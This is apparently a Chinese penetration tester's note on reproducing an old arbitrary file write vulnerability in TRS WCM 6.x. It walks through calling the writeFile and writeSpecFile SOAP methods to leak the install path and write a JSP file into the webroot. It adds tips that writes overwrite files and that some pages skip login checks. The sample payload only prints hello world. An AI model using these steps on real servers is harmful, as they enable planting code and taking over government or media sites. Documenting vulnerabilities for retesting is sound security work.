TRS WCM 6.x任意文件写入

官方介绍：
TRS内容管理系统，即TRS WCM是一款面向政府、媒体和企业等行业用户的内容管理平台，支持在云计算架构上进行集群化部署，并且支持内容管理云服务模式，为不同的、多级组织机构提供内容丰富、形式多样、可扩展的内容管理云服务，具有与社交媒体融合、一次采编/多渠道发布、碎片化发布、可视化专题制作、富媒体内容管理等功能特点。

今天做复测时复现了该漏洞，TRS WCM 6.x已经是很多年前的系统了，这个漏洞也是n年前公布的，也是刚接触到，所以记录一下。

0x00 复测

首先访问 http://xxx/wcm/app/login.jsp，确定是6.x版本

访问 http://xxx/wcm/services，发现templateservicefacade服务存在writeFile和writeSpecFile

0x01 利用

使用SoapUI操作接口，
http://xxx/wcm/services/trs:templateservicefacade?wsdl

打开writeFile的request，参数1可以随意输入base64，参数2为上传后缀名，返回数据中暴露了物理地址

打开writeSpecFile的request，参数1为写入内容的base64编码，参数2为绝对路径
绝对路径为：/opt/TRS/TRSWCMV65/Tomcat/webapps/wcm/demo/index.jsp
上传内容为：Jmx0OyVvdXQucHJpbnQoImhlbGxvIHdvcmxkIik7JSZndDs=（<%out.print("hello world");%>）

0x02 中间的坑

1、writeSpecFile是会覆盖文件的，这点注意
2、上传的文件访问会验证登录，但下面几个上传位置通常不会验证，~/wcm/index.jsp,~/wcm/demo/index.jsp,~/wcm/include/login.jsp